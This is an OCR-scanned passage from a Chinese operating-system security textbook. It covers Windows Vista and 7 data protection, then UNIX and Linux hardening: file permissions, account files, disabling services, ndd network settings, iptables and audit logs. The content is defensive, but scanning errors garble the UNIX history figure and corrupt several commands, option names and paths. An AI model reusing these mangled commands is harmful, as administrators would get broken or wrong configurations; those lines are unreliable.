NAP 的 安全 中 心 提供 反 间 谍 软 件 IE 安全 设置 .用户 权限 控制 的 状态 信息 。 

数据 保护 提供 bitLocker, 加 密 文件 系统 .版权 保护 RMS、USB 等 存储 方式 。BitLocker 
基于 可 信 平 台 模 型 (Trusted Platform Module, TPM) ,具有 可 锁定 启动 进程 (要 求 用 户 提供 
Credential) ,硬盘 全 加 密 (Full Volume Encryption，FVE) 的 功能 。 表 6. 8 为 不 同 场景 的 


Vista 数据 保护 。 
表 6.8 不 同 场景 的 Vista 数据 保护 
场 景 BitLocker EFS RMS 

笔记 本 NA 

Branch office 服务 器 V 

本 地 单 用 户 文件 NA 

本 地 多 用 户 文件 J 

远程 文件 J 

网 络 管理 员 不 信赖 NA 

远程 Office 文档 管理 V 


Windows 7 是 Windows Vista 的 后 续 版 本 ,界面 上 与 Vista 差异 不 大 ,但 微软 为 Win 7 
做 了 大 量 的 优化 ,使 Win7 在 同一 硬件 平台 上 的 运行 速度 比 Vista 要 快 。 

因为 Win7 是 基于 Vista 核心 技术 上 改良 ,来 自 Vista 的 其 他 重要 安全 功能 ,包括 用 户 
账户 控制 (UAC) .内核 修补 保护 程序 、Windows Service Hardening、 地 址 空间 布局 随机 化 
(ASLR) 以 及 数据 执行 防护 (DEP) 等 也 都 保留 在 Win7 中 。 此 外 ,还 增加 了 新 的 安全 功能 ， 
如 AppLocker 能 够 帮助 控制 在 自我 环境 中 运行 的 应 用 程序 , 加强 了 核心 BitLocker 
DriveEncryption 的 功能 ,结合 了 IE8 ,提供 灵活 的 安全 保护 ,防止 恶意 软件 和 攻击 。 

Win7 的 系统 备份 和 还 原 功 能 更 加 智能 化 ,方便 .快捷 地 修复 系统 ,甚至 可 以 不 再 需要 
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Ghost。Win7 在 安装 程序 或 者 对 系统 进行 重要 改动 的 时 候 自动 创建 还 原点 , 当 系统 崩溃 后 
就 可 以 保证 将 系统 还 原 到 最 近 的 一 个 正常 状态 。 常 见 的 系统 问题 也 都 可 以 用 Win7 的 
WinRE 功能 来 修复 而 不 需要 重新 安装 系统 ( 注 : Win7 的 维护 功能 需要 开启 系统 的 备份 还 
原 功能 ,修复 可 能 需要 Win7 系统 安装 光盘 或 修复 光盘 ) 。 


6.4 UNIX 系统 安全 


UNIX 作为 一 种 安全 稳定 .高效 的 多 任务 .多 用 户 操作 系统 ,早已 被 广泛 应 用 在 各 个 领 
域 。 如 何 增强 系统 本 身 的 安全 性 ,防止 非法 用 户 的 入 侵 已 成 为 UNIX 系统 管理 员 的 首要 任 
务 。UNIX 从 贝尔 实验 室 走出 后 的 发 展 历史 如 图 6. 35 所 示 ,UNIX 的 系统 框架 如 图 6. 36 
所 示 。 


1970 1980 1990 2000 Time 
L 1 1 1 
FreeBSD 5.4 
BSD family ~| NetBSD 2.0.2 
OpenBSD El) 


=| BSD (Berkeley Software Distribution) | 


Bi Joy | Sanos (Stanford University) | Solaris (SUN) 10 


Darwin 


一 
NextStep 3.2 
1 MacOSx4 
| 一 Xenix OS 
MicrosofySCO GNU/Hurd 02 
Projecte GNU 
i | GNU/Linux 2.6.12.5 
Richard Stallman Fe=| ‘0.12. 
Minix ， Linus Torvalds 2.0.2 
Andrew Tanenbaum 
UNIX Time-Sharing System (Bell Labs) 10 
Ken Thompson 本 
Dennis Ritchie (C language) | HP-UX lliv2 
| 一 ze 5L 
=| UNIXWare (Univel/SCO) 7.1.4 
-| IRIX(SGD 6.5 


System III & V family 


图 6.35 UNIX 的 发 展 史 


Linux 的 官方 定义 是 “Linux 是 一 种 UNIX 操作 系统 的 克隆 , 它 ( 的 内 核 ) 由 Linus 
Torvalds 以 及 网 络 上 组 织 松散 的 黑客 队伍 一 起 从 零 开 始 编写 而 成 。Linux 的 目标 是 保持 和 
POSIX 的 兼容 。”Linux 是 一 个 可 独立 运作 的 POSIX 兼容 操作 系统 , 它 也 包含 了 SYS V 和 
BSD 的 功能 。 它 完全 是 独立 发 展 的 ,其 中 没有 包含 任何 有 版 权 问 题 的 代码 。Linux 可 以 在 
符合 GNU Public License 的 情况 下 自由 传播 ,内 核 版 本 有 1. 0 一 2. 0 一 2. 2 一 2. 4 一 2. 6, 发 行 
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图 6.36 UNIX 的 系统 框架 


版 本 有 Ubuntu、Fedora、Redhat .TurboLinux .中 科 红 旗 等 。 

UNIX 的 启动 过 程 (以 Solaris 为 例 ): 系统 自 检 、 显 示 系 统 信息 、 读 取 启 动 设 备 的 0 扇 
区 、 在 启动 设备 寻找 启动 程序 .加 载 启动 程序 .启动 内 核 。 当 系统 内 核 运行 完毕 ,加 载 好 所 有 
的 驱动 之 后 ,就 会 把 控制 权 移 交 给 /sbin/init 进程 ,也 就 是 所 有 进程 的 父 进 程 , 然 后 由 init 读 
取 /etc/inittab, 依 次 执行 /etc/rcl1(2,3) 启 动 脚本 ,最 终 到 达 inittab 中 指定 的 默认 运行 级 别 。 

UNIX 安全 模型 主要 有 账号 (用 户 和 口令 ) 安 全 和 文件 系统 安全 。 文 件 系统 安全 是 
UNIX 系统 安全 的 核心 。 在 UNIX 中 ,所 有 的 事物 都 是 文件 。 用 户 数 据 的 集合 是 文件 ,目录 
是 文件 ,进程 是 文件 ,命令 是 文件 ,设备 是 文件 ,甚至 网 络 连接 也 是 文件 。 

1. 文件 保护 

UNIX 的 文件 系统 框架 (以 Linux 为 例 ) 如 图 6. 37 所 示 。 当 用 户 创 建 一 个 文件 的 时 候 ， 
系统 保存 了 有 关 该 文件 的 全 部 信息 , 即 文件 的 属性 ,包括 文件 的 位 置 .文件 类 型 及 权限 .文件 
长 度 、 哪 位 用 户 拥有 该 文件 .哪些 用 户 可 以 访问 该 文件 .i 节点 ,文件 的 修改 时 间 ,文件 的 权 
限 位 等 。 

系统 的 交换 分 区 (Swap Space) 用 于 数据 交换 ,文件 系统 的 部 分 目录 结构 如 下 : 

。 /: 根 文件 系统 ,用 于 存储 系统 内 核 ,启动 管理 和 其 他 文件 系统 的 装载 点 ; 

。 /opt: 可 选用 的 第 三 方 应 用 软件 ; 

。 /export: 一 般 包含 用 于 NFS 共享 的 目录 ; 

/export/home: 目录 包含 用 户 的 个 人 主 目录 ; 

。 /var: 存储 经 常 发 生变 化 的 文件 ,如 邮件 .日 志和 打印 文件 等 ; 

。 /usr: 第 二 个 文件 系统 ,基本 上 是 和 系统 核心 无 关 但 又 属于 操作 系统 一 部 分 的 目录 ， 

大 多 数 是 应 用 程序 ; 

。 /bin: 系统 启动 时 需要 的 一 些 通 用 可 执行 程序 ; 
/tmp: 临时 文件 ; 
。 /modules: 内 核 可 装载 模块 ; 
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modules drivers include lib 
unix |‖ inet net linux mips 
char asm-alpha alpha 
block asm-i386 sparc 
scsi asm-m68k m68k 
sound asm-mips i386 
asm-sparc 


图 6.37 Linux 的 文件 系统 


/root: root 用 户 的 工作 目录 ; 

/proc: 进程 文件 系统 ,存储 指向 当前 活动 进程 的 虚拟 内 存 的 伪 文件 ; 

/sbin: 系统 可 执行 文件 ; 

/dev: 设备 入 口 点 , 放 着 所 有 系统 能 够 用 到 的 各 个 设备 (UNIX 系统 中 每 个 设备 都 作 
为 一 个 文件 来 看 待 ); 

/etc: 存放 各 种 配置 文件 (相当 于 Windows 的 注册 表 ) ,包括 用 户 密 码 文档 等 ; 

。 /mnt: 软盘 .cdrom 等 其 他 文件 系统 的 临时 装载 点 。 

在 UNIX 中 用 模式 位 表示 文件 的 类 型 及 权限 ,如 图 6. 38 所 示 ,通常 由 一 列 10 个 字符 来 表 
示 , 每 个 字符 表示 一 个 模式 设置 。 从 ls -1 命令 所 列 出 的 结果 的 第 一 位 是 文件 类 型 位 ,其 中 ， 

d 表示 目录 。 

1 表示 符号 链接 (指向 另 一 个 软 链接 、 硬 链接 的 文件 ) 。 

s 表示 套 接 字 文件 (进程 间 通 信 时 使 用 的 特殊 文件 ,以 . sock 结尾 ) 。 

特殊 文件 用 b 表示 块 设备 文件 ,c 表示 字符 设备 文件 ,p 表示 命名 管道 文件 。 

-表示 普通 正规 文件 (或 者 更 准确 地 说 ,不 属于 以 上 几 种 类 型 的 文件 ) 。 

第 2-10 位 : 表示 文件 存 取 权 限 , 用 r 表示 可 读 ,w 表示 可 写 ,x 表示 可 执行 ,一 共 9 位 ， 
分 为 3 组 (每 组 3 位 ,一 组 是 文件 的 拥有 者 u、 一 组 是 文件 所 属 组 的 成 员 g、 一 组 是 其 他 所 有 
用 户 o) , 合 起 来 称 为 模式 位 (Mode Bits)。 每 一 个 权限 位 用 一 个 八进制 数 来 代表 , 读 属性 
代表 数 是 4, 写 属性 w 代表 数 是 2 ,执行 属性 x 代表 数 是 1, 如 果 同 时 具有 三 者 属性 就 是 4 十 


2 十 1==7。 u g 0 
文件 的 一 组 访问 权限 可 以 看 成 一 个 垂 阵 ,矩阵 提供 了 一世 see] sae 
一 个 指定 保护 策略 的 方法 。 fle A 区 
使 用 chmod 命令 可 以 改变 权限 ,以 新 权限 和 文件 名 为 (ownen (world) 
参数 ;审计 结果 放 于 日 志文 件 中 ;密码 由 crypt、des 或 pgp a 


加 密 程序 加 密 。 图 6.38 UNIX 的 文件 模式 位 
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使 用 chmod 命令 ,用 户 可 以 按照 需要 改变 属于 自己 的 文件 的 权限 位 设置 。chmod 命令 
的 一 般 格式 为 : 

chmod [who] operator [permission | filename 

who 的 含义 是 : u 文 件 属 主权 限 ,g 同 组 用 户 权 限 ,o 其 他 用 户 权限 ,a 所 有 用 户 ( 文 件 属 
主 、 同 组 用 户 及 其 他 用 户 ); operator 的 含义 :十 增加 权限 ,一 取消 权限 ,= 设 定 权 限 ， 
permission 的 含义 :r 读 权限 ,w 写 权 限 ,x 执行 权限 ,s 文件 属 主 和 组 set-ID,t 粘性 位 ,1 给 文 
件 加 锁 使 其 他 用 户 无 法 访问 。 带 t 的 文件 在 执行 时 会 被 放 在 交换 区 ( 虚 存 ), 带 t 的 目录 意 
味 着 其 中 的 文件 只 有 其 属 主 才能 删除 ,其 他 用 户 即 使 同 组 或 拥有 同样 权限 也 不 能 删除 。 

chown 命令 改变 文件 的 所 有 权 , 其 形式 为 : 

chown-R-hownerfile 

R 选项 意味 着 对 所 有 子 目 录 下 的 文件 也 都 进行 同样 的 操作 。-h 选项 意味 着 在 改变 符 
号 链接 文件 的 属 主 时 不 影响 该 链接 所 指向 的 目标 文件 。 

chgrp 命令 改变 用 户 所 属 的 组 ,格式 和 chown 命令 差不多 。 

Group[ 用 户 名 ] 命 令 找 出 当前 (或 指定 ) 用 户 所 属于 的 用 户 组 。 

umask 命令 允许 用 户 设 定 文件 创建 时 的 缺 省 模式 ,对 应 每 一 类 用 户 ( 文 件 属 主 \ 同 组 用 
户 、 其 他 用 户 ) 存 在 一 个 相应 的 umask 值 中 的 数字 。 对 于 文件 来 说 ,这 一 数字 的 最 大 值 分 别 
是 6。 系 统 不 允许 在 创建 一 个 文本 文件 时 就 赋予 它 执行 权限 ,必须 在 创建 后 用 chmod 命令 
增加 这 一 权限 。 目 录 则 允许 设置 执行 权限 ,这 样 针对 目录 来 说 ,umask 中 各 个 数字 最 大 可 
以 到 7。 该 命令 的 一 般 形式 为 : 

umask nnn 

其 中 nnn 为 八进制 000-777 。 

通过 设置 umask 值 , 可 以 为 新 创建 的 文件 和 目录 设置 默认 权限 。umask 命令 是 在 /etc/ 
profile 文件 中 设置 的 ,每 个 用 户 在 登录 时 都 会 引用 这 个 文件 。 

说 明 : 文件 的 最 大 权限 rwx rwx rwx (777) ,目录 权限 rwx rwx rx (775) 就 是 目录 创 
建 默认 权限 ,文件 权限 rw- rw- r- (664) 就 是 文件 创建 默认 权限 。 

2. UNIX 系统 账号 安全 

UNIX 的 账号 (account) 是 用 户 资源 的 信息 ,包括 用 户 名 和 口令 属性 。 用 户 IDCUID) 范 
围 : 1 一 499 号 是 系统 使 用 ,其 中 0 号 是 root 用 户 ,从 500 起 是 普通 用 户 。 

用 户 账号 信息 存储 在 文件 /ect/passwd, 用 户口 令 信息 (加 密 ) 存 储 在 文件 /etc/shadow， 
普通 用 户 的 主 目录 是 /home/ 用 户 名 ,超级 用 户 的 主 目录 是 /root。 

UNIX 中 超级 用 户 (root) 控 制 一 切 , 每 个 账号 是 一 个 单独 实体 ,每 个 用 户 得 到 一 个 主 目 
录 和 一 块 硬盘 空间 。 每 个 用 户 账 号 创建 时 ,系统 管理 员 分 配 一 个 UID 进行 标识 。 

用 户 按 某 种 权限 组 成 一 组 成 为 组 群 ,每 一 个 用 户 都 属于 某 一 个 组 群 GID, 包 括 系统 组 
群 ,私人 组 群 , 组 群 名 、 组 群 ID(GID) 和 组 群 口令 等 。 使 用 组 群 的 好 处 是 组 群 中 的 用 户 享 有 
该 组 同样 的 权限 ,有 人 员 变 动 时 只 需 改 变 组 的 成 员 即 可 ,不 必 去 为 每 个 用 户 设置 属性 ,节省 
了 大 量 的 重复 劳动 ,方便 管理 用 户 。 组 群 账号 信息 文件 是 /etc/group, 组 群 口令 信息 文件 
是 /etc/gshadow。 

SUID/SGID 是 用 于 设置 用 户 ID 或 组 GID 的 命令 ,也 是 网 络 入侵 者 非常 爱 用 的 入侵 入 
口 ,SUID 程序 代表 了 重要 的 安全 漏洞 。 当 用 户 执行 一 个 SUID 文件 时 ,用 户 ID 在 程序 运 
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行 过 程 中 被 置 为 文件 拥有 者 的 用 户 ID。 如 果 文 件 属于 root, 那 用 户 就 成 为 超级 用 户 。 

鉴别 时 用 户 输 入 口令 ,系统 使 用 改进 的 DES 算法 (调用 crypt()) 对 其 加 密 , 并 将 结果 
与 /etc/passwd 或 NIS 数据 库 中 加 密 口令 比较 , 若 匹 配 则 合法 。 

检查 文件 的 权限 模式 ,在 它 的 第 4 位 如 果 不 是 x 而 是 s, 就 是 一 个 SUID 程序 。 

新 建 用 户 账号 useradd 命令 ,格式 为 “useradd[ 选项] 用 户 名 : ”; 设 置 或 修改 用 户 的 口令 
以 及 口令 的 属性 passwd 命令 ,格式 为 "passwd[ 选 项 ][ 用户]”。 

Passwd 文件 格式 为 name:coded-passwd:UID:GID:user-info:home-dir:shell, 包 括 用 
户 名 、 经 过 加 密 的 用 户口 令 / 隐 藏 的 口令 `.UID.GID ,用户 全 名 信息 .用 户 的 起 始 目录 、 执 行 
命令 解释 器 所 在 的 路 径 7 个 域 。 默 认 账 号 如 表 6. 9 所 示 。 


表 6.9 默认 账号 

用 户 名 功 能 
adm 拥有 账号 文件 ,起 始 目 录 /var/adm, 通 常 包括 日 志文 件 
bin 拥有 用 户 命令 的 可 执行 文件 
daemon 用 来 执行 系统 进程 
finger 执行 finger 命令 
games 游戏 
halt 执行 停止 命令 
lp( 或 lpd) 拥有 打印 机 ( 行 式 打印 机 ) 后 台 打印 文件 
mail 拥有 与 邮件 相关 的 进程 和 文件 
news 拥有 与 USENET 相关 的 进程 和 文件 
nobody 被 NFS(Network File System) 使 用 
shutdown 执行 shutdown 命令 
Sync 执行 sync 命令 
SyS 拥有 系统 文件 
uucp 拥有 uucp 工具 和 文件 


账号 安全 要 求 禁用 和 删除 不 必要 的 账号 ;在 /etc/shadow 的 password 域 中 放 上 NP 字 
符 ; 确 保 root 只 允许 从 控制 台 登 录 ; 限 制 知道 root 口令 的 人 数 ;使 用 强壮 的 密码 ;确保 root 
没有 一 /. rhosts 文件 ;使 用 普通 用 户 登录 ,用 su 取得 root 权限 ,而 不 是 以 root 身份 登录 ; 设 
置 umask 为 077, 在 需要 时 再 改 回 022; 使 用 全 路 径 执行 命令 ;不 要 允许 有 非 root 用 户 可 写 
的 目录 存在 root 的 路 径 里 ;修改 /etc/securetty, 去除 终 端 ttyp0-ttyp9, 使 root 只 能 从 
console 或 者 使 用 ssh 登录 。 

3. UNIX 网 络 安全 

多 数 UNIX 系统 用 户 用 VI 命令 编辑 /etc/default/login 文件 ,添加 # CONSOLE=/ 
dev/console 来 规定 登录 途径 ;在 /etc/ftpusers 里 加 上 root 来 禁止 root 远程 FTP 登录。 

一 些 重要 的 网 络 配置 文件 说 明 : /etc/inetd. conf 配置 决定 inetd 启动 网 络 服务 时 的 启 
动 命令 .启动 的 服务 以 及 服务 的 相关 信息 ;Vetc/service 文件 记录 一 些 常 用 的 接口 及 其 所 提 
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供 服务 的 对 应 关系 ;/etc/protocols 文件 记录 协议 名 及 其 端口 的 关系 ;/etc/Re *. d、/etc/ 
inittab 定义 了 系统 缺 省 运行 级 别 ,系统 进入 新 运行 级 别 需要 做 什么 ;/etc/init. d 目录 包含 了 
系统 的 一 些 启 动 脚本 。 

在 inetd. conf 中 关闭 不 用 的 服务 ,用 vi 编辑 器 编辑 inetd. conf 文件 ,对 于 需要 注释 掉 的 
服务 在 相应 行 开头 标记 # 字 符 即 可 。 清 理 其 中 所 有 的 TCP/UDP 小 服务 .所 有 的 调试 服务 
(echo、discard、daytime、chargen) ,所 有 的 R 服务 (rsh、rexe、rlogin) 、 几 乎 所 有 的 RPC 服务 ， 
使 用 必要 的 工具 替换 telnet \ftp。 

在 Services 中 关闭 不 用 的 服务 ,在 相应 行 开头 标记 # 字 符 即 可 注释 掉 。 启 动 网 络 参数 
设 定 文件 /etc/init. d/inetinit。 

加 固 ARP, 在 不 繁忙 的 网 络 上 加 快 过 期 时 间 ( 默 认为 5 分 钟 ,减少 并 不 能 避免 攻击 ,但 
是 使 得 攻击 更 加 困难 ) ,如 减少 到 1 分 钟 。 


#ndd -set /dev/arp arp cleanup interval 60000 
#ndd -set /dev/ip ip ire flush interval 60000 


使 用 arp -f filename 加 载 ,可 建立 静态 ARP。filename 内 容 如 下 : 


test.nsfocus.com 08:00:20:ba:al:f2 


user. nsfocus.com 08:00:20:ee:de:1f 


使 用 ifconfig interface -arp 命令 禁止 ARP, 网卡 不 会 发 送 和 接收 不 在 ARP 表 中 的 
ARP 包 。 

关闭 ip 转发 (或 创建 /etc/notrouter) : # ndd -set /dev/ip ip_forwarding 0; 为 了 防止 被 
用 来 实施 smurf 攻击 ,关闭 转发 包 广 播 : # ndd -set /dev/ip ip-forward_directed_broadcasts 
0; 关 闭 源 路 由 转发 : # ndd -set /dev/ip ip_forward_src_routed 0; 关 闭 响 应 echo 广播 : # 
ndd -set /dev/ip ip_respond_to_echo_broadcast 0; 关 闭 响 应 时 间 戳 广播 : # ndd -set /dev/ 
ip ip_respond_to_timestamp_broadcast 0; 关闭 地 址 掩 码 广播 : # ndd -set /dev/ip ip_ 
respind_to_address_mask_broadcast 0 。 


防止 ping, 在 /etc/rc. dyrc. local 文件 中 增加 如 下 一 行 ， 
echo 1> /proc/sys/net/ipv4/icmp echo ignore all 


防止 连接 耗 尽 攻击 ; ndd -set /dev/tcp tcp_conn_req_max_q 1024( 默 认 连 接 数 为 128) 。 

BIND 主要 配置 文件 包括 named 配置 文件 (/etc/named. boot(bind4) /etc/named. conf 
(bind8)) ,DNS 数据 文件 ( 正 向 解析 文件 、 反 向 解析 文件 .Db. cache 文件 ) ,解析 配置 文件 / 
etc/resolv. conf。 基 本 安全 配置 是 named 进程 启动 选项 ,-r: 关闭 域名 服务 器 的 递归 查询 功 
能 ( 缺 省 为 打开 ) ;-u 和 -g : 定义 域名 服务 器 运行 时 所 使 用 的 UID 和 GID;-t : 指定 当 服 务 
器 进程 处 理 完 命令 行 参数 后 所 要 chroot( ) 的 目录 。 应 及 时 更 新 安装 bind 的 最 新 版 本 
http://www. isc. org/products/BIND/bind9. html。 

使 用 最 新 版 本 的 FTP, 用 ftpusers 限制 ftp 用 户 ;使 用 ftpaccess 控制 用 户 行为 .流量 
等 ;建议 关闭 匿名 FTP 模式 ;设置 chroot 运行 环境 ;编辑 /etc/default/ftpd 文件 ,修改 或 屏 
蔽 系统 版 本 信息 BANNER; 用 SCP 或 sftp 代替 ftp。 

编辑 /etc/motd 文件 、/etc/inetd. conf 文件 ,改变 TELNET 登录 的 提示 和 BANNER 信 
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息 。 推 荐 使 用 ssh 代替 不 安全 的 telnet。 

Sendmail 安全 配置 : 修改 文件 /etc/sendmail. cf, 关 掉 expn 和 vrfy 命令 ;限制 可 以 审核 
邮件 队列 内 容 的 人 ;关闭 open relay;/etc/aliases 的 权限 设 为 644, 从 /etc/aliases 里 删除 
decode 别名 ;设置 smtp 身份 验证 ;限制 邮件 大 小 ;及 时 更 新 安装 最 新 版 本 的 Sendmail。 

检查 本 机 运行 rpcbind 的 使 用 情况 ,rpcbind 是 允许 rpe 请 求 和 rpc 服务 之 间 相 互 连 接 
的 程序 ,但 标准 的 rpc 是 不 安全 的 。 

用 showrev -p 查看 系统 的 补丁 安装 情况 ,及 时 安装 系统 的 补丁 程序 。 

4. 安全 防范 组 件 及 工具 

UNIX 内 核 安全 组 件 包括 防火 墙 组 件 (ipchains 和 iptables,linux 是 Netfilter) .PAM 认 
证 (Pluggable Authetication Module) .OpenSSH 以 及 第 三 方 安全 工具 。 

PAM(Pluggable Authetication Module) 框 架 将 新 的 认证 技术 方法 加 入 操作 系统 中 , 同 
时 不 需要 修改 和 认证 相关 的 命令 如 login su,ftp 和 telnet 等 。PAM 的 配置 文件 是 /etc/ 
pam. conf, 用 以 指定 PAM 的 认证 策略 ;一 个 库 文件 /usr/lib/libpam. so, 实 现 模块 加 载 和 
PAM 框架 结构 ;多 个 模块 /usr/lib/security/。 

防火 墙 组 件 Iptables 中 使 用 了 三 个 规则 链 来 过 滤 数据 包 : INPUT 规则 链 用 于 处 理 进 
和 人 防火墙 的 数据 包 ,OUTPUT 规则 链 处 理 从 防火 墙 发 出 的 数据 包 , FORWARD 规则 链 处 
理 转 发 的 数据 包 。 

IPTables 使 用 service iptables start、service iptables stop 和 service iptables restart 来 
启动 .停止 和 重启 IPTables 服务 。 系 统 启 动 时 默认 引导 iptables, 需 要 修改 chkconfig 运行 
级 别 为 : 


chkconfig - - level 345 iptables on 
IPTables 的 语法 : 
iptables [-t 作用 的 Table] [处 理 chain 的 方式 ] [ 比 对 规则 ] [处 理 方式 ] 


防火 墙 规则 只 在 计算 机 处 于 开启 状态 时 才 有 效 。 如 果 系 统 被 重新 引导 ,这 些 规则 就 会 
自动 被 清除 并 重 设 。 要 保存 规则 以 便 今后 载 入 ,使 用 命令 /sbin/service iptables save。 使 用 
iptables 服务 之 前 必须 先 关闭 ip6tables 服务 service ip6tables stop、chkconfig ip6tables off。 
Iptables 和 ipchains 的 主要 区 别 是 : PREROUTING 和 POSTROUTING (PREROUTING 
处 理 DNAT 规则 ,POSTROUTING 处 理 SNAT 规则 ) ,这 些 规则 用 于 实现 伪装 以 及 网 络 地 
址 翻译 (Iptables 的 功能 ) ;规则 链 的 匹配 方法 不 同 ;iptables 是 基于 状态 检测 的 功能 。 
Netfilter 是 Linux kernel 中 对 数据 包 进 行 处 理 的 框架 。netfilter 子 系统 提供 了 有 状态 
的 或 无 状态 的 分 组 过 滤 ,还 提供 了 NAT 和 IP 伪装 服务 。netfilter 还 具备 为 高 级 选 路 和 连 
接 状态 管理 而 变形 (Mangle)IP 头 信息 的 能 力 ,netfilter 是 通过 IPTables 工具 来 控制 的 。 
Netfilter 结构 的 TABLES 包括 三 个 表 , 哪 个 表 是 当前 表 取 决 于 内 核 配置 选项 和 当前 模 
块 。 用 -t table 选项 指定 命令 要 操作 的 匹配 包 的 表 。 如 果 内 核 被 配置 为 自动 加 载 模块 ,这 时 
若 模块 没有 加 载 ,( 系 统 ) 将 尝试 (为 该 表 ) 加 载 适合 的 模块 。filter 是 默认 的 表 , 包 含 了 内 建 
的 链 INPUT( 处 理 进 入 的 包 ) .FORWORD( 处 理 通过 的 包 ) 和 OUTPUT( 处 理 本 地 生成 的 
包 ) ;nat 表 被 查询 时 表示 遇 到 了 产生 新 的 连接 的 包 , 由 PREROUTING( 修 改 到 来 的 包 )、 
OUTPUT( 修 改 路 由 之 前 本 地 的 包 ) .POSTROUTING( 修 改 准备 出 去 的 包 ) 三 个 内 建 的 链 
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构成 ;mangle 表 用 来 对 指定 的 包 进行 修改 ,有 PREROUTING( 修 改 路 由 之 前 进入 的 包 ) 和 
OUTPUT( 修 改 路 由 之 前 本 地 的 包 ) 两 个 内 建 规则 。 

Netfilter 定义 了 5 个 HOOK 位 置 : NF_IP_PRE_ROUTING NF_IP_LOCAL_IN NF 
_IP_FORWARD、NF_IP_POST_ROUTING 和 NF_IP_LOCAL_OUT。 包 过 滤 使 用 
INPUT、OUTPUT 和 FORWARD 三 个 规则 链 , 可 以 增加 自 定义 规则 链 iptables -N xxx。 


其 他 iptables 命令 格式 为 ， 

iptables -L -nv /< 显示 * / 
iptables -F 规则 链 名 /x* 清空 规则 链 * / 
iptables -A 规则 链 名 规则 /* 增加 规则 * / 
iptables - 工 规则 链 名 规则 /*#* 插 入 规则 * / 
iptables -D 规则 链 名 规则 /¥* 删除 规则 x* / 


其 中 规则 为 “-j 动作 … 条 件 ”。 动 作 有 ACCEPT( 接 收 数据 包 ) .DROP( 丢 弃 数 据 包 ) 、 
RETURN( 从 当前 规则 链 返 回 ) .LOG( 日 志 , 用 dmesg 可 以 看 到 )、REJECT( 拒 绝 ) .SNAT/ 
DNAT 等 。 条件 有 : -s 源 IP 地 址 、-d 目的 IP 地 址 、-i 接收 接口 名 、-o 发 送 接口 名 、-m state 
(状态 包 过 滤 状 态 ) .-p tcp/udp/icemp( 指 定 过 滤 协 议 )、--dport 目的 端口 (或 者 服务 名 称 )、 


--sport 源 端 口 。 
Tcpdump 是 Linux 的 Sniffer 软件 ,可 以 用 来 对 当前 的 网 络 通信 量 进行 动态 跟踪 和 
监听 。 


Nmap 是 Linux 最 常 使 用 的 收集 信息 工具 ,可 以 被 用 来 判定 网 络 布局 。 管 理 员 可 以 在 
网 络 上 使 用 Nmap 来 寻找 其 中 的 主机 系统 和 开放 的 端口 。Nmap 是 比较 合适 的 弱点 测定 的 
第 一 步 ,为 建立 使 用 安全 服务 和 停止 不 使 用 服务 的 策略 商定 了 良好 基础 。 

第 三 方 安全 工具 有 SSH Sftp 和 Scp 等 。 其 中 SSH 提供 远程 控制 /管理 服务 器 (替代 
telnet,rlogin) ,远程 执行 命令 (替代 rsh) ,在 主机 间 安 全 的 传送 文件 (替代 ftp) ,端口 转发 (为 
其 他 不 安全 的 网 络 服务 提供 安全 加 密 的 网 络 连接 ) 等 功能 ;sftp 提供 安全 ftp 客户 端 ;scp 是 
安全 远程 备份 工具 ;TRIPWIRE 是 一 个 文件 系统 完整 性 检查 工具 ;TROJAN 是 一 个 可 以 被 
任何 用 户 运行 来 检查 特洛伊 木马 的 perl 程序 ;PGP 是 流行 的 邮件 和 文件 加 密 程序 ;LIBDES 
是 建立 DES 加 密 库 和 DES 加 密 程序 的 工具 ,包括 crypt() 的 快速 实现 ;Lsof 是 确定 正在 运 
行 的 那些 进程 以 及 使 用 的 端口 等 。 

5. 审计 与 日 志 安 全 

UNIX 审计 与 日 志 包括 连接 时 间 日 志 、 进 程 统计 和 错误 日 志 。 日 志文 件 说 明 如 表 6. 10 


所 示 。 
表 6.10 日 志文 件 说 明 
日 志文 件 目 标 
access-log 记录 HTTP/Web 的 传输 
acct/pacct 记录 用 户 命令 
aculog 记录 调制 解 调 器 的 活动 
btmp 记录 失败 的 登录 
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续 表 
日 志文 件 目 标 
lastlog 记录 最 近 几 次 成 功 登 录 的 时 间 和 最 后 一 次 不 成 功 的 登录 
messages 从 syslog 中 记录 信息 (通常 链 到 syslog 文件 ) 
sudolog 记录 使 用 sudo 发 出 的 命令 
sulog 记录 su 命令 的 使 用 
syslog 从 syslog 中 记录 信息 (通常 链 到 message 文件) 
utmp 记录 当前 登录 的 每 个 用 户 
wtmp 一 个 用 户 每 次 登录 进入 和 退出 时 间 的 永久 记录 
xferlog 记录 FTP 会 话 


(1) 登录 连接 时 间 日 志 。 有 关 当前 登录 用 户 的 信息 记录 在 文件 utmp 中 ,登录 进入 和 退 
出 记录 在 文件 wtmp 中 ,数据 交换 .关机 和 重启 也 记录 在 wtmp 文件 中 ,最 后 一 次 登录 在 文 
件 lastlog 中 。 所 有 的 记录 都 包含 时 间 戳 。 

基于 utmp/wtmp 的 命令 有 : who 命令 查询 utmp 文件 并 报告 当前 每 个 登录 的 用 户 ;w 
命令 查询 utmp 文件 并 显示 当前 系统 中 每 个 用 户 及 其 所 运行 的 进程 信息 ,标题 栏 显示 当前 
时 间 、 系 统 已 运行 了 多 长 时 间 、 当 前 有 多 少 用 户 登 录 以 及 过 去 1.5 和 15 分 钟 内 的 系统 平均 
负载 ;users 命令 打印 出 当前 每 个 登录 用 户 的 用 户 名 ,用 单独 一 行 显示 对 应 一 个 登录 会 话 ; 
last 命令 往 回 搜索 wtmp 来 显示 自从 文件 第 一 次 创建 后 登录 过 的 用 户 , 报 告终 端 类 型 和 日 
期 (lastb 命令 作用 类 似 ) ;ac 命令 根据 当前 /var/log/wtmp 文件 中 的 登录 进入 和 退出 来 报告 
用 户 连接 的 时 间 ( 小 时 ) ,-d 选项 产生 每 天 总 的 连接 时 间 ,-p 选项 报告 每 个 用 户 总 的 连接 时 
间 , 如 果 不 使 用 选项 , 则 报告 总 的 时 间 。 

(2) 进程 统计 。 进 程 统计 文件 名 字 为 pacct 或 acct, 目录 在 /var/log (在 Linux 系统 
中 )、/var/account、/var/adm 或 /usr/adm 中 。 

创建 pacct 文件 命令 为 # touch /var/log/pacct, 然 后 运行 accton: # accton /var/log/ 
pacct。 关 闭 统计 命令 为 # accton。 

lastcomm 命令 报告 以 前 执行 的 命令 ,不 带 变 元 时 ,显示 当前 统计 文件 生命 周期 内 记录 
的 所 有 命令 的 有 关 信 息 ,包括 命令 名 ,用户 ,tty、 命 令 花费 的 CPU 时 间 和 一 个 时 间 戳 。 

(3) 经 过 syslog 实施 的 错误 日 志 。syslog 设备 的 重要 元 素 包 括 /etc/syslogd (守护 程 
